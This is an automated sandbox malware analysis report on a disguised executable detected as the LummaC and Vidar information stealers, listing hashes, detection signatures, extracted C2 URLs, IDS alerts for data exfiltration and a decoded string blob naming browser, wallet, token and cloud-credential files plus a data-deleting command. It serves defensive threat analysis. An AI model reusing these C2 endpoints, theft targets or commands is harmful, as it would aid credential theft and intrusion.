Windows Analysis Report
MasterKeyX_Pro_v4.3.exe

Overview

General Information

Sample name: MasterKeyX_Pro_v4.3.exe
Analysis ID: 1599300
MD5: 759ab3658c9bc6af1d9885d549173ebf
SHA1: d8495e9cc8ef8f80a4a149aa633964fca3e08ae3
SHA256: 09267e88154b76a263fd7501e1325744a316ac686182c175de0f383a6616d6f2
Tags: exeLummaStealervidaruser-aachum
Infos:

Detection

LummaC Stealer, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Vidar stealer
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to launch a process as a different user
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection

barindex
Source: https://indybike.shop/j Avira URL Cloud: Label: malware
Source: 00000000.00000002.2627741539.000000000472E000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199819539662", "Botnet": "go2dniz"}
Source: AddInProcess32.exe.2680.8.memstrmin Malware Configuration Extractor: LummaC {"C2 url": "https://adventureseekerstop.top:443/api", "Build Version": "bFcGh6--2301"}
Source: MasterKeyX_Pro_v4.3.exe Virustotal: Detection: 61% Perma Link
Source: MasterKeyX_Pro_v4.3.exe ReversingLabs: Detection: 50%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: MasterKeyX_Pro_v4.3.exe Joe Sandbox ML: detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0041E081 CryptUnprotectData, 8_2_0041E081
Source: unknown HTTPS traffic detected: 91.134.82.79:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 91.134.82.79:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49963 version: TLS 1.2
Source: unknown HTTPS traffic detected: 5.75.209.106:443 -> 192.168.2.4:49968 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:50015 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:50018 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:50021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:50029 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:50035 version: TLS 1.2
Source: MasterKeyX_Pro_v4.3.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: vdr1.pdb source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2627741539.000000000472E000.00000004.00000800.00020000.00000000.sdmp, MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2612742813.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2612742813.0000000002D13000.00000004.00000800.00020000.00000000.sdmp, MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2627741539.00000000046FB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000006.00000002.2282204244.0000000000140000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then lea ecx, dword ptr [edx+014B0E26h] 8_2_004100EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov esi, ecx 8_2_0040CA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+6089C535h] 8_2_00445B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], C8B478E8h 8_2_0042CBE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000094h] 8_2_0043EC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx esi, byte ptr [esp+edx+7FC08F55h] 8_2_0043EC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov eax, edx 8_2_00429F42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov edx, ecx 8_2_0040CF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov byte ptr [edi], dl 8_2_00412762
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000001E3h] 8_2_00412762
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov word ptr [edx], ax 8_2_0040F717
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx eax, byte ptr [esp+edx+69FE9BD2h] 8_2_00443F26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then cmp dword ptr [ebx+edi*8], CD5A394Bh 8_2_004467E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], CD5A394Bh 8_2_004467E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov ecx, eax 8_2_00419000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then cmp dword ptr [eax+edx*8], E40A7173h 8_2_00419000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov ecx, eax 8_2_00419000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+00000086h] 8_2_0042D020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+310813C5h] 8_2_0042E03E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then jmp ecx 8_2_004450C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then jmp ecx 8_2_004450D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then jmp ecx 8_2_004450DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx edx, byte ptr [esp+ecx+00000086h] 8_2_0042D14A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+02h] 8_2_00427150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], DC6B6BB0h 8_2_0041C955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then cmp dword ptr [ecx+esi*8], DC6B6BB0h 8_2_0041C955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 8_2_00430930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then cmp dword ptr [edx+esi*8], C8B478E8h 8_2_0043F9C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then cmp word ptr [ecx+edi+02h], 0000h 8_2_0043F9C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then push eax 8_2_0043F9C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov eax, dword ptr [00457FFCh] 8_2_004441FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_0042FA03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], C6BF57D2h 8_2_00442200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movsx ebp, byte ptr [esi+ecx] 8_2_00444A31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_0040DAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov ecx, eax 8_2_0042AAC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov byte ptr [edi], cl 8_2_0043428A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov byte ptr [edx], al 8_2_00420289
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov ecx, eax 8_2_0042AA89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] 8_2_0040A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] 8_2_0040A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx edx, byte ptr [eax+ecx] 8_2_0040E360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov byte ptr [edi], bl 8_2_00433B7D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then jmp ecx 8_2_00445310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov byte ptr [edi], cl 8_2_004343D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h 8_2_00431BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov byte ptr [edi], cl 8_2_004343EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov byte ptr [edi], cl 8_2_00434393
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-41704336h] 8_2_004433A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov dword ptr [esp+02h], 02CE9287h 8_2_004433A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax-41704336h] 8_2_004433A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then jmp ecx 8_2_004453B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx edi, byte ptr [esp+eax+00000218h] 8_2_00411BBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 8_2_00419C65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx edi, byte ptr [esp+ecx+4Ch] 8_2_00426C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov ecx, eax 8_2_0040DD4A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx ecx, byte ptr [ebx+eax] 8_2_0040EDC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx ebx, byte ptr [eax+esi] 8_2_004105D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_0042F59D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 8_2_0043BDB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+02h] 8_2_00443634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+02h] 8_2_00443634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx ebp, byte ptr [esp+ecx+0Ah] 8_2_00420EC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_00420EC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx edi, byte ptr [esp+ebx-4078D9EFh] 8_2_004206EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then cmp word ptr [ecx+edi+02h], 0000h 8_2_0042EE95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 8_2_00418F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov edx, ecx 8_2_00421748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov word ptr [ecx], bx 8_2_00421748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh 8_2_0041BF76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov edx, ecx 8_2_0041BF76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov edx, ecx 8_2_0041BF76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov dword ptr [esp+04h], eax 8_2_0041BF76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C1F0655h 8_2_00442710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov edx, ecx 8_2_00421735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov word ptr [ecx], bx 8_2_00421735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then push esi 8_2_00425FF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov edx, ecx 8_2_00444F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then movzx eax, byte ptr [esi+ecx-7E37731Ah] 8_2_0040EF95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov eax, ecx 8_2_0041D797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h 8_2_0041D797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then mov ecx, eax 8_2_0041FFA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 4x nop then jmp ecx 8_2_00444FB0
Source: chrome.exe Memory has grown: Private usage: 10MB later: 40MB

Networking

barindex
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:50006 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50020 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50018 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50018 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50015 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50015 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50017 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49978 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50042 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.209.106:443 -> 192.168.2.4:50006
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50019 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50043 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:50043 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50046 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:50046 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50049 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:50049 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50048 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:50048 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50051 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:50051 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50045 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:50045 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50050 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:50050 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50047 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50052 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:50052 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.209.106:443 -> 192.168.2.4:49996
Source: Malware configuration extractor URLs: https://adventureseekerstop.top:443/api
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199819539662
Source: global traffic HTTP traffic detected: GET /xLJXQ55/mamasafa-Final.webp HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xLJXQ55/mamasafa-Final.webp HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /sc1phell HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
